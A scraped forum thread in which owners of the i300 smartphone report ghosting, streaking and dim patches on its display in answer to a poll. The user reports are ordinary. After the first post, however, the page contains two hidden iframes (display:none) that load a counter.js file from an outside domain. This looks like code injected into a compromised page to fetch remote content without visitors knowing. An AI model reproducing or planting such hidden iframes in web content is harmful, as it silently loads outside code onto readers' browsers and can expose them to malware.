Poll: Do you see ghosting or streaking on your display?

+ Reply to Thread

Streaking/Ghosting on I300 display

Ok, so we all know that the I300 display isn't going to be comparable to the Prism or M505. But some of the usenet discussions about the I300 lead me to believe that there might be a wide variance in screen quality from phone to phone. For example, it was discussed here previously that some phones are missing and entire row (or two?) of pixels down the left hand side.

In the latest thread we're discussing on usenet, the topic of "ghosting" or "streaking" has come up -- for eample, on my phone if you go into the address book application, you will see the dividing line down the center of the app that delineates the names from the numbers.

If I adjust the contrast slider to under the "u" in "Adjust" on my I300, everything looks fine. If I slide it towards the right, when I start getting towards the "n" in "Contrast", you can see a visible extension of the address book dividing line down in the virtual graffitti area.

The only way to know if this is a common occurrence across all units, or maybe just some buggy ones, is with a poll.

So, do you see ghosts or other types of residuals in your display?

-Doug<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Same thing on mine. Is it a bug or a feature?

My display works great. as a matter of fact, I returned my m5050 cause I thought the display was much worse than my ol palmv. when I saw the i300, I thought the display was very nice - kind of makes me deduce that my i300 display is actually better than the m505....!....?....
    Cliff

I have a dim area in the shape of a quarter circle along the top and some dim areas on the right side of the screen.

Anybody seen this?

User ***** Rulz Enforcer

SolFree

I notice streaking along the sides,, it looks like bars of lighter color or different color. I just started noticing this within the past week, it definately wasn't there before as i had paid attention to it when the post was initially started.

When i play solfree, it is very noticable, and it even gets worse. But it's not so bad in ZAP 2000, maybe because there's a lot more going on....

This all could be related to the 'low power consumption' screen, but i never noticed it before and i wonder if it's going to get worse.

the display is much better when i apply 2Red, but the graffiti area which doesn't change color is still the same.

You can get 2Red from here:

http://in2space.com/2red.html

i'll post again if things get worse...

hth

chris

I've had 2 i300s in the last 2 weeks. The first one had a dark band down the right side like a shadow from the battery icon...and a lighter band down the left form the signal strength indicator. The screen was 'yellower' and you had to run the contrast really low.
    My new one has no bars and the screen is just right.

BOTH units (plus the ones I've played with), all have 4 faint semi-circles along the right side. You can see them the best if you look across the screen at an angle from left to right.

I'd say the one I have now is the best of the several I've seen.

Getting worse as time goes on..

Yep, streaking is bad on mine.

Think it is getting worse. Noticed it before I noticed the poll... so no psychosomatic streaking for me.

Mat

Yes, ghosting/streaking

I've had my i300 for about 5 days now and all was fine until I installed Watchix and viewed a clockface that had a dark background. Now I have a vertical line going down the middle of my screen -- not really a line but the right half of the screen is a bit darker than the left, making it look like a line. If I lower the contrast it goes tolerably away on most apps except for those with dark background color. When I use an app with lots of color there is also a lighter vertical band going all the way down on the left 2/3s of the screen.

It's really annoying, but given the other screen problems people have been having, I'm wondering if it's worth going to those rocket science technicians at Sprint...

yc
    yc